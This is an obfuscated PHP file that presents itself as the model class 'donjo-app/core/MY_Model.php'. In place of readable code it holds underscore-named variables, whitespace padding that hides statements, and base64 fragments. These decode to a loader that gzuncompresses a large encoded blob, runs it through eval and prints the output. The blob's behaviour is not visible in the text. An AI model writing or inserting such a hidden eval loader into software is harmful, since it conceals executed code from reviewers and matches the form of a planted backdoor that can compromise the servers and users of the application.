<?php 
        $__='printf';$_='Loading donjo-app/core/MY_Model.php';
        















































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtfVlz6ki29XtF3P9QDzfi9I36vi4JTFURFfWAMBISNjYaUkIvHUgyAksMx4AZfv1dOzUggYR9+g4RfcM67TIWUg479157zOyff06uf/8Hrr++rd/my+3025/8z/T661uwWr6u/v9kvf7VX729/Po4/sfjKniJ/76erX/uxpPN5u9///u3P39Km/r53376+vev9+8nWvOf/xuvv67ufHPE9mZsi3NX6f31jd86c82nrpQv//r56/q6vq6v6//m9c1fMCFwtJ2qsMbY3q80uT11jtHvCWgCNRO4/scXqb6ur+vr+rq+rq/r6/q6vq6v61/t+gpnfF1f19f1df3fvb55k83Lb3f/CF78VfDy7c8vinxdX9fX9XV9XV/Xf+kqFyt0w9X7IFyF/GcuKRP7EKtKvJsY0nxsB+uxfRe6inycmKuB2uU/odmUYi8eanonf8+cOEPBtYVwYrcWXlPbjp3hWlX02G/0Qr/JtuMFO6p9/L3QxAnuBXZLCOxN6Nn4zl7jnrxLn8/7GTnSZmJvZ34jojHs1P7wPXC0V9eQXr2Gno0zmjja2lPik6poaF/H8xgvb++w9htsR+/rovSoyuNTd975Tj9qbzabHKX7iSMJY6NzfLzvtNSuED6+dg5DQ7r3GuIcc4lVGW022qK/GMZqL975TX0d9Jkwsds7tTtbBX19/zT/493rYx5LtnMb23fPYbuJg3EcWzvXGb0PRpxG6hjzHTXifaD0kn7mna16r+4fX0ehpbDjBHTy+2xDNNcVdhobUm+CNQgUeaPKZ9oNlJkQ9KUT75fWYsHptpvYo/V5fjruBzNvLq29BdEvnrugU0KX+LeJfbcBPeMxaIV+lv5CFibO40ZVtrGvyBHunSa2vMfvfYDxvNjyzj1KW9duRWNHmgXKlto+je0D2pd3vE8Fc0ZfPuYytltL9CVgDUR8/5atFeenRbzBGkZeYyti/XeY3wnfCRjf29iOBbUbzotrb9ittTqPMF4822doS19TH54ivwV4xkt4UECfNN752OE8sHvo8jaJF0Ws9YroX+A7rFXAxzYmWihi7C3jGfiI3qN5LgNbm026fMzv1GZgJPMnXvcX8TwAjxM9Hzq8f+oTY9TRpk797ce2PgONW2NHmwVdKaF/kwlPZ3kbuVTfgfugwSqwaW04X74mfAneNojW8oloC3rvr5/na0lyt6Z3/SU7cfo02BHPvKXyC54SuEzhvkDrinHxudL36dxyeQdtsSYxrbfkQ4YwR1ofDXy0U3sa1pjzQsYfLVprTr9FsAJviP6Rj1nM7gFTZvhNY0nGoCR4QDIy6bOcR7EmG2rLBU8SHwYKX2/6fgOaY32AKT15j3G/cXzpEU/d5Xhh9Zgxslp9Q5AttXdgZiQ/4JknA3JksKGs92IJ3z2pXc3ULU3SBVkzLflpZEiS3pOfbKs3x9pbaGOEe4ORJWpo4wl90t8jZoFPeppkWJuQoS9LRH9sFKINhv89cRmQddkCNlqRbD1gfXWrxcxebKINCw3QGIe6FUhm5IdGj8aHZ2VdUuWhZFq90BLYw8g6aGhH0/n3GtrT8TwogbmpvbXEBLmbtPcYGsIB4xEwri2eY+bI2krmXJJYT2YJDmxlPD8wMF+6b2EumEc4YrpkHfn4wLHsaWTxefIxmj3QJWq5mLOlMw3jiS2iAebxMGJDLaHpme6jvjQbN7Yzt2GFald6Jv6xhLiX9A9ecPSV11TxXSdkSrxVZcKsIPYgX97CT/RJlGN/OFKG734/PgL7VpCbS9zcPxkpbpoW7rfBS+BVQzJcJ9cPGngFeKaL4ON3b95ZTfq64N+v3h8awCNbE4kfgfH4HQtj53HnLZjwcIw+0///GG6DVsA8zucx0SofczNoBsfW0ltaO+jWJeawHnO9xk4PjWDvdVurQBHBA8HI7Er2455jS4fke3LscLqrhb7dRixA7uYPi+G7Z7Tz9XoQ2sCXlmlYo2xt37vhWvSxrsDjvdMT312FbXzxAP3YWkxs//cu8Ab0lvy+5Jt2O3Ltw8npue/+QpwF8lAkvfK0r2zDdB0dWNRaFrC+uj0Z9xytD2zbZ20Z9mET2CLpHsFlBzNA26CNgL7Bi3IEXvD1npq1p3mkh2zgnaPHDo2rL737S93XF/IrcDqm8YwbM/Bk73fMGf26aJtFg27QBc/LkBvL6PprtX/4Q1XY3cQZrTSh9c6xdsFewSencVNb+/1ROLaHr+gfOCxvPKXddO3RcmBuBt35H99T3O/4fe2ddFjQj8KREE9HC7ZD/9BV2htfr+QnGhfupzyy9xdYJ0cTXmCnGKydrUVYeA8/+mt6P5PRI/Ec5twizHEEves0ZRHttJwG+NM+gGZqqCn6vKaf3ihuk223dI1SPxgjrXcQ17wHWZTEoDQ2/t6a3+9U08NUSMdcvtOJPLq/r3unPQNvHa/fwf3OP/EO7tfMaeM1LunN50T3a+jdFiF/V3TQlPR+zfisBb6vGJ+f3q8Zn+naJHsx/i6N75TfH9X0B0zxGxwzy/1l92v4lzFNu6ZHJwIer2vGyAJlfFdBQ5Hu0zsP+/Ur1vsEe2Jos/aQbH6vK8UvfbJt9VNC1wRPusvNgL8PWo4XwMcjZKfR3sHWXDqNOHrary6+lxawBV8T/SBNnQawEDoDGANZDmnMpMt+7xboALv4CHwUnl7XV8/n7WfzVmZr/yj8wvmoK/zi9mGzweYBngBvhivX8KEbNkuyEX3yi+Z++GzehVoDuKNYy4duZzkGNkG37LVjp/087yxd+BieEy0dIyqNS+vrK9ju2+fF4X1sj/Bbn7uL9hH6eEW4UzWuIm3Ue4H0KP8bc8N4pAfXiVYDA+NexEe/OeKfoafSfqU2/MaEJtAj0DOvquJClw4Tvwi2X6C0gT8ibDUGfG6fgr660hT4Rkp7+8DHIc9de78hnAK2rWkM2tGnv5sT8BUwpq12/SX5TtTPy3515hElXsBHiMh3mRhR+buLebqKSnSBDWuV+k/fLdFxOiquobR2YTdo/WAFno0HRpkXUl4VJvA7H0z4RHPhlwD6w19Y53dKtD/TLMdN2L983vn6gacW7toV22sX80tptL7ul+YVn8hGH9PajK7mv32GDQHaE29GkwbhlVDZDvAcuK9Nx8sop09le6Ah9KcwuO+J1d8HcfDBmKEnT4F9EBzQHnZBa9AF/Ys06WsxrNwj5JFsxnfw6Bb+B/kBU/gwwpi13868BJ9F6ZHcXaxdomOTzxRDYIJHsgobA3YAvUs+4NprwM9xGPA52mVjLb43ViTI+2yffzcnnQCay+03HnvAutn78/P8N+QZ8gK669NHg/MyfFIN/e7DjCdy3mPCptA2/20fA+hrtnHlP47akd7RZ8Aq/k7KW7m8OMY+463vKX95hB2wlyLn9LjMZAxYUpAptKkM4b/FAfms2didM59+L853smhDRz+Gz4bkXY81nZupon3t92ysj0uB7Fl6J783NVrgZ/5calNrtf2roPv4/N35PvQH+dEe/GF/qc2g10rrcR4fdBNwGv4u/FrtOHYizHn9DjvzVLXOowLP8XZz3obtm2DdPsA8J/Zj6C5hizV1zjspD4EPD2u/qU8hYxHHLHkbEO2LtANep7qnjMV+E/4B8ZEolOVAIXuKwY4NwwFsCoo3OI0t9JyFOT2GJKf4vL5oj/9M7DG9891rxDv/WImN/IfrBxv6pQuMS+mjUpyhq1MJdWXbBSzzknfuNqmdGXF+68d7lwmYMz4v5M2FTvwAo3l7q9p2L7C6hKuX9/vC4OqevMlw8CO55OPn68lt9ivMP/n2AWtK+kldvRxzHZDa28EU/L/KeJ/0JmynDewuDEoHrx7gc0WYr3vEWErPXekPg+yH+M01wuLYufzz7yqwm+wGl3zQo7/GmJbwsaYJjsYYgz49jyVuDwz1hv478+fEJj1O/B0umdXSTOGO4wt9P7igUV6Kf6EbU6zF3IYHr4v5L7XYb7IN5DeV5/Aay6ttNYH2RI3tmUb+86T5mNKQbbjcnem0pu9furROATOjWGcWt6siz0G/SkSyuRjDv3Qr5TPV/xQHg78HOpTaqbEHYO8mvmzA+y3QIKyWQ3wHm/wQkx5Xo+GzGQ0l1p39nq3nFPYNxXkmC3Ez6arrahnoXPAT21To6Ky/JfkOvtyeg+bLpF3/RruzWUDxlWO4HAltZsajVfIO6DfvHLRjVCPjkOsGA5/Vf+8t2dZpau8B1nBQJWupnQe7N435jajPfTXt+ZqdyO8mG9RpMNgYbdjb/vYBdrXViDfgGR4PHTXYm3p/mKnKDBg4bquwvR/m0mlCsYEmdEEXdKE8htg+pXkNrHcHPO3PnyPQYvEHtQf7i23V+7sQPuTyuduePc/vlhf2dmEuh3fYdVsa39gOYvgBkAf4UHOyE7QetwXTNQcfpnwstiED8EN7YWpXhS+J3o29PvQbjy/HPIZWpFGSK4HvuTiIWawcvgRs4Ijiv2jnIEKPboFVxzRPsya/erJkAo9nz9V1LXaf9WUiOxXznRZ57wKLtT7lRmQRdtwOcsztKPiSMWhzdCE78I1AG//dFluzB2ctPbDV/sGMpw9MeHtoRNwv4rZRZqua1zKrGkU/h73BxyEZfvOPYdHvoNjfIbDZ1FvIW2DALX26Jbt1AswHZpDPF6vd8aKIMdAZHBstxmTtht79CB/VSH6k2LIq69IoOsiwh37PZHpqd8KRpfdUmT0ZTGa6IWlmpMt2VyK+KM/HEdFfCUfmg+q1GvyXxwh+Teh6aKs9uafDb85wc0p2YD6Gzmpc4O1x93JMFz7Smdc4zT+pH15dewsd3Irw+zTopvLSLfBMlU9J/tj8ArPnZJvI9P7Mb1g1vkrJjhncwndNGD6DR6xBShun0Zp5Nuw4nt+hnJtf7esBJzxgtWG1FFPUhiOmQwe3ppYwVHVLlB7ioUX3LFHXRuLjstofTG2KbpDYPvCj0ngn14kYe2XfuU3STOyUdMzLgg9/+71Gaa7Lgo6unmuiM8g+eA+OIdkwHP8I93/QPph6djsKaDugIr4DHzf1sQSsX3PI/dfknYOnNYebwPYp1hJq83Gdj57bWGc6oZ0+4UKQ9Y85S3l7wLtfwGNb+CyiB3/RbxxE9xgEjlGwidBupY6rkYcqnH04/hGaSf/XNh0+PxuX9ne84zlDmfxrDeP3a+bSSWkEH6F7F2pH6dmcSz3GpEfDgu3Ss0JDYC4waqT3ZAsYlcyV7CHZlUyZydZxlt7jOd3jxXeiv9ivQTPoq/aO9AMjvLGYCbmB/XxH360mtg75viMbzh5ZB6azxxXkFnzMdgPY9cAvMbhsF/qNvsvieKW2oWeBe7ugGy2fyriwIh3pda+x4cKmLeND94/3tMZAmoCO/lHqubY7Iz2i9ngcdBYo7ePlmhnQwy92L8xz23PpO9mTaqoDVCU4wsacjoFtLnxB8Es0tkNuC8CGsRKsS/Kp9HxgZ3bCMM7+Nu2Y8v2nCWsvKEfmx+095r6dOLDHTurh8d7aFWMfBT1Yjnfx+AKbug7Jjw6sDZaUo3Ea8hvFi6EHb+rUTAbgL3E5q9OZ0CU8RpnJsX0MIHtB8HT1vNRWKbfUsGrbIhonsT/YCpTbp9hj2m5uSynxPLCpduGinqTPZbjGntVJ9x5fjAo+yX0uGrdfb1slWJTloX57gu3tC0NeW+LNwyXl7nleHnZkIj9kOwZFvxN2aj0dK8aZfi7idRHfeAwrX6dizFgT4Sef/qjBxRu+evjBGveTnBRol8aswhQjy2PJcJPHqLnOCE5ZPtFpJOsJ/ivqkbV7/zn7R0tk7JnbzY4OG51wpJCDfF0T5vPPBnx95kC+I3qn89tT1B7pTAMOto0qe0ujGg34IoV77QLGLLSiPdHURL+XyBLkhcsW5copp+o1Ve7jurBrHrk9nMtGiR8co/Pr81HaAXc2t+PRCV75faofGc6IB5OaGCuEPdlAe5SfrcklyK8TxeK+Ir3vNJL34Uvxeh0H+Aefe4Y1mibPslyf3IgfJDTJ1izXb9XxuAtarV25zenF7Q1bz/ojms0SPOax0ALPYh2Ulugp+8rcD9mzXD9ynVKxrpAJp8F5YElr+jxP+uXj6u5rns/49Px8Ns5r+QnScSd5R54rUpL5nmOpFOe6jCUmPnRZ16dx4gblsYcC/KKybBNtGiU9U4crEcUNKadXwXftcw6a36vHi/vP+AA19gp8dU5juZ3RJ4n9LPF5OfowP8CSGq8UT6UcQ1Le31XHjMlWkLd4Zv2isCiPr48q49bwa6FjF3fQx+13r/PZ+DLGJWc4H57j/0qSO8mxsFsfu8LaTtMYeCGm+Il8We4rZHmDizyZIcUe7Ikq3X5eX31exHDiiUIeY33Ldr1oQ/R5rsf60B690KvvD0fJMgX9+el1FerQ3xTzS+rk8trINBdLuWkGWygM1eUmSrAkjqaMagDEtRe3qe5PVEtylWAc91UW7iZwhqsb+awf8V9z/yXX98cwOn/+MdxKsTnN5VJOmCV2SFLjJwBjpzxebFzaJQkPWQ3QxxZn0HmEx/cer5+6K63F+Fy/k+StS1hSbQNiDvHkSFiat3OuNTRXvwVUo0S1Eb0AvqI28+ThK9VTDHry3pepVods6KGf5a0NW0/u4d1x4zDzm4/rIv9d4VuZhtCR1bnxUly+sY1fkrxejhPAvTc3y8lf2TZZDJnmCvrndnJUn1/p87ouyhUU+2iMbdg7BuyduvgisNa1N5BdtqeYBeUMzjxTYY/1hdDlse+6WGrn/L5YYfsZ5foK9f6PXwt2bxH3a9un2BzZZSlWkx+V8oK/rrLtP49B5I/hcym3zrEk7UufYh2ORNuy3XiuLU3yr+fxfNLXBS9QvZ+8c8lfKPmuvJ6V10WPbe7DfgemgN9KPmp6L6I6bGAeW3rNpDai0E5+f2D4VTmIz/ur9bmflbdgzUrZNMJ1giUH0W/MdO4/WDkW/vfiX5Pb31PiwRdbfCWe5vE440dttwtZPwmfsEM6SV9ss4Q9uoENy2sZiffT+MkyGd9oC/ttx+MYcptqTjf5OPEuxWLHkFvCxQfCjr5+DOwL/ZfWgkDO0/UPgpJ/cFlP+bq2DKvlmtZQdsQhxf1k06weu9+MyVYRiuN/NqTvfoPnSHZjnrcObz2/UXtrk+KNrDczTDGY0mf4OPis1s3jlfLX4FPYmForpRnWaLiGjImBEl7UE2XrRHpe9rRmimGwh8dLwtZElseNGLqGCZNupT+Xz+ESq7J410U92HUMUMxzkXlbpDM91l7DZ4O9QP5mtf1U9zzPny7BY3EbNseQ8varfJ4Nvq5T2GlUd4957kMjHj6bcdsyZO2ZiW36LFux9mzNr+T1U+PneewfGP/l87fHT3UI7J8d/5Wtlsh9GCYyTvs4NDHd95DZgFRDPaN9GudcGWw5yhsBdwdGGitL968Etk62PcWPB5d6J+Nvmp/eU397WqZ5+G4gBA02z753Gqnsdf0fsCeiYrwd7RxSLBulsfZKXKm0v7jtILZPAd9D8rENcfk8fLiI00ZGfwqjeiqiYxaHzuQVskY5frIbeCz60/b+D9DurOcvareqfIA8DpDg5VXdIcXxyF9ym8P1eV9Q1h/tvQmoNvw0Gd2oU6TcaoNqwodr2Fv0Ds9HPnL9st4Cz/MavcdudQ3PZZ0n+phj7kfKrfuKTHnkpXZhf2GNFmRT0fdE7+w+YRS/d4Hl44ZLNiDFjKeFd4r6Pc9743PhOW7XHh7vK9vbBbY45XsEmo+Jv37f21/g+au7CCDn0K0MuNYMThxPeSz2TJ+Ld7IxpWvgc1+d18vTvI/Rh3m0jG4f+u4KdOtCXuVYUJJBvncqzf3dVdS3nevEMltQzXKFnSpfX3v3GvukNnzJNpXP9Pm+MKpbj8a2K7iOWt1vflwlbzN/5mF/i1eBg0lMoKLOKKl9SfvktgmPBVfnOc/2YSZb1/Gi2VUeNK1rLMT6S/GeYj6wpjamaJdWxzsVLd1fAB/M1iNeY53Evs95e7nO/ymPh+ObfKuGrbNM6srOdfw8pibET6zrb2p8ljR2l9Z+L2RgWtrXfe9QisNdj4/HYLXznob2c2oXf/DezF0m9eHn9/K1/mCceuwuZNHrj5Zq4g/9ktrJNe9JwfVYpKCyNofHi+MT39NJGJnlp/J8u5TWuknFdanLBVX5jfU+ck/vwgZOa/jONce39PMjj9O0j6wuz5H6D8V402VMk9Ov3HfeD881oD1/OUzy14s4coxKv7uGllnsnevGkOIz3Ies9nMGVXmtsi7O1qFki1zK7D6tI3Tq6Maxjs9Hj3ktf6FO76berpHxIMVsndefxksvophKOD/XNYnT8xjcN3We1UFzjKuIU6f04XHfyvwa2ZZ5DPacf+H1O2eMS/cw4TPFVdfuMqZx0B6zXbGGxN5f5ExSLCmPi8u2d5nb/Wew5/I96of01diOd7Cr+HuPZu/mO8kalvsCLlCetPo9Wbi6f+blog22Kuq1JP5WlnfKQR9h757GfG837UWmWONtfezZ8Z2LdzUlyVPAr6nCkGqdWr+37XN6tiRv4a8F24D2S894vCbF0Mwm0Oi3wlZOg9//oK70Mo8RwK5ie9jMAmgkDC7iMik+pn3/SOxe+11T5M3Elk9To4Sr84eafUC3ajDHi/bGpZqaBA/qc/XleNu7H7czTCYZT+bRFHal2OE8x5lKvPxkfr+GDlV2yv/63Otw9cP53siLZHW88MtHq0/VYb9e5lLLORJeF9t3aX9IpsvprAEx23NZLzM8HjAdO8HMK8tMiptFmcnzV7lvZYtCuS8uY+6MfM5qGxa426dzOZiQxJPaVO9HMSfK0wgF3XcRk7/IRxrVvFDph5dpn9XQxS+0B6V/rkEfGIm+S2IYndmzyedXacuQfsn2aCXP19dKjxsz0HuzejShs0f1tS2Zfp1c2Q78LAzwsbZOzrRAe32rvjbblveDPmGSzuOzXhKLWAV2621gpDZoMibQRJz53dkJfQuXeczBeb3XFH+Ab8D3bw/Ka7F+yvbf1Ocjsjw8xSq8sv2WxKlKMZj7Kpu1Uj74uJ5qZHpqRDdq4/kenRX4Hfx/IRN8fyKnD8UnoAs6Zx4xV2Gw4Gtyc658PR2J59chN8sxfDv0E9F5BIV671v7dHqj19Vv6T6wAo/yuBBvl9ZhQjXZJANUI0I1eZc1RXU5p75QlafZeA3Kz9J+YYpBhEtv0RboXANurwlUU5XaYJRjd6ieRaNzS9aZ7ZvgSOa7Uz3FXXimXcW6/kBd5Nn3TvClIsYAW1wTqY4+4OeW+NnZN6ux3WrxM1lsTUR/XMYKONrlNWM999mKmKYLd0luqKtTnfvMKfuMFOteO019jnmK3pLOiwFmLJJzaSBj3+mMGk3Zxukz0YTvSWLTtHb2M/kTBXZ9jDXcGQ3WGlSPg3A3mrC2MF7w2pjFJKmtT/tNPzcK+3YpBtG7tHPIRpeA+cCBZVzql+QytTUrczOJz8JxJuZz74ZLS2DWmY6tKdHR4bXOwweLdMN954InEz5P5DDTARrWl/xmKfXVeI087R/FXA/tcVLzATs/CjM7n9faF+ZL9fYTagu+PXDryRRHoRmzR7MrSYzpzw7s9ZGoyabFYLerVX7HG+1hm2R7LMBH4J/ML6b4FGRwRPsf6LvjC88fwr6w/ZDyHN6R6jiH8JOoFmUUDvpYq6M0x/sxMDyp6aIYlyPx9qnGM+hKi4z+dIYO2my5F+9c2vak+6BDV0kbehM6YkpnggBjsN7bKY3bVeLjBOtMY4PeXVFs3m+k8pDK8MTerh/miXxgPbm9n/JrSPq2bl7pfpWUfyK8w1rXNnCvlscq402Jn851UtrPSgUf8rMU0j13yXqnctgXQ14HCpvvhfswvM4hpP0K7mJL/ELyAv3bW6s9OtNnP/9gf3d1PWh4szb/3hRaJpPpjKGW5YjDe6PHhqN0L3HNvoTb9fdiskfDEVqSme5/wxyngaJtPtgnUB5L4X2e02TcJ6Na8RmXkdttGbrlypDnp5HAek7FmAjbaseU7C2/sf9Bk/WIoY+WZVjyI7Di2YyHlhXJmhnrpna8sgNvx0ChA+CL0v76xGels8zoLLhzffB+bG9nVEPsLVrvwLByjT1oA7v/lde3dDXT6LWdfK+MzPdqMOsoOVhbQweu8H1QSrwDnQr8KPBamiJm0b4i6KBI7bEnHdijk31pdJaG3dp58Hm1o3pl79JemHz81/UQKY+GhTGX9yE8VZ67QHuqKD5F5y5V+UMJBlFt1fXzEvnQ2d70G/uM9QPVjQbcv6E8gsXj2iPrYOlMDVlP7po9K+S593w/r/CLyfdy8b16IZ1tBZ6Rad45jU4bYF47nXeme0mP8jwCXwfYK9AnteOqqamQp4k/ktPlY9+uok4zbQ/rc865DGivpclzUFW+J+mZk8tjZ2xLGF7yASg3AVs8+Qx9p9BZfDw/mvhfdPYe+WrpPsMMr1ObB1i+xv1UDrKY3ZzrqYrcI/cDJb8RJz5c3f6xeCibPXbPeH2ka5iCkOBsikukd5kwA15YJfz1j9LOa45S31mCLI6K33P9bFjwOeSs/VznJzqX9sQV+sswB/3R+YKXNP+9dj8qYa+V0u1+T/bIjXquc35rwmm9v9hPlJ/Vgs9y5PL8Tlpjl9uIl3HHyx+thNWJXqP9VvK0FC/s8/lf2KczotFi0hRD6NEiTpu5PZTpx+TZEj3xDq+J0q2DTPVQI0E28dPTk/vM6ulS+b5am3sYfLSXtOSPM7Jxn1IbqM6PItnIawfIvpyAxsBtbgel5yys3cYdtzkyWagZX9mXytfmHF834ecYfN3ct4er5zObmp6XYG8O3+g8gJyW8DOTmFFee8ttcZ63yGv6Zh61fc7jHGpyM3y8PxLzhozrxXj32SeQN/OR0H6yRN0YWRSf5jJV4UvoJIOkn2XDCp7o3EE73e+ZyGcUgq8UncFejoYy9N+FPZ7tDc18HL4/NDTBp3qPPepMl9XeUILOl3TwE91nDDQu3587H+Ju8gP7nvaJQM8N6dzCldZovZMPz89l6gaSy3MwvA4lOcczyzF3aa944qvh9/Kc90rvpxiW1gsmZ2PmuJvEGtJ9XYX8dOrj5jyS6K8Mi1MdV+SVCmy62l8OrNTX40Z6llSDn5ua1T1ntuk8059FnKYzt6B3M9sgrX1Ulzft3Qp7WxOHMivwhCOAJ1ibbNp7Q6SzUfj5AbX1ACleVtZ+GIq8D5zHUI/awKy4D6x50FlUzBVV2qm3au4nvM3hNNdzcZv03OqjNrlNTeeh1dSIpHrvcs9l1V7hhb9ob7F2mhkRTovAzphqqICdM/iZvV0uQ7GuwRaalmRT/nDv7/+Af5Hb3ve6pU8Tu4xNzUge6uczkGKv4hyIYr62PI/208gS5aSuqkKPVbe1hC99FQfPsQ82INZLdCvOCyjsOeM1MViDpn8E39/f1dhcn8DWj/b0KzqdD0iY2bOi9uhKL9/S4Tdr6a7H9iP75vNYBLvm/QyPbp5plO4XMCnWARzie+cSbCCZ2dE+SIqPJjly+HU9/X2c5Ati6+rd8LK+NDlvQWGn/B73aYbku2zHlgibUAYfJGe+gWYW9wusZA+66xTi9Fd8Ep+sbO4WxU3OOYiLfEDJt+HnDDgz2t/L/Zrk7/DWvtf0zAjhl4kzHPmLmM72pLPQErswPRsg3Vee7rdo5T5AfobBjbr9YrtZDO6a94u6Q6OzoN4+rLmv5bML2pnnPBO9U8RYqhMfN7YSaKBMnJlVrOHwFMZ94cFonc0t8xOJ5ypi2Yc48fdKtReZvsjyNun5Spc14Qkds/MP0zhkdmbe3BJmz+woAS8PzLRaZuY3vGTnnlkkm6ytyoFKeIzvea6a8yPP8UmSGY1C3ZnBPupx35XHvsR2Mfa1vJRlrS+9FXm7ZlzZuR8KsGOYnb+R0W9q5LGFB9eJ0/NN+DlIIyuKhyOmudDnlfWmqpHJuchzZNP+PlR5XeJmXV//WYrfzi999CuaJWeE5GPJbEVe8zOPPhfLqzmDpECDoSnomh5HPPbI/aKezFivPcXne2DtkOJFak1d9RkrL3MLa9ghf/317c+ffvrf/z9t+Iv//lv613/8+SOvF979zIv/fu7wb9/ov9/+X95tPvN/++nr37/ev5/Ka/y3ElMlS/wff/4nOFG18Q==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      














































































































































































































                                                                                                                                                                                                                     $________;
